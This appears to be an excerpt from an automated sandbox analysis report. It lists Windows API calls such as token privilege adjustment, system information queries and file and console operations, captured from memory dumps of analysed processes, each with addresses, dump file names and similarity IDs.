                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F4BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8F471319,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F4BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2164254317.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2176518909.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156446448.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156446448.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0057AD37
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0057AD37
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0057B329
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0057B329
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 01E801D0
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01E8072D
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 01E80DD6
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01E8109E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0057A23E
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E80819
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01E80502
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01E8072D
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 01E808E5
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0057A94A
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 01E80DD6
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8CDA2506,00000000,00000000,00000000,00000000), ref: 0057B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2154969582.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.2156114848.0000000001E80000.00000040.00000001.sdmp, Offset: 01E80000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

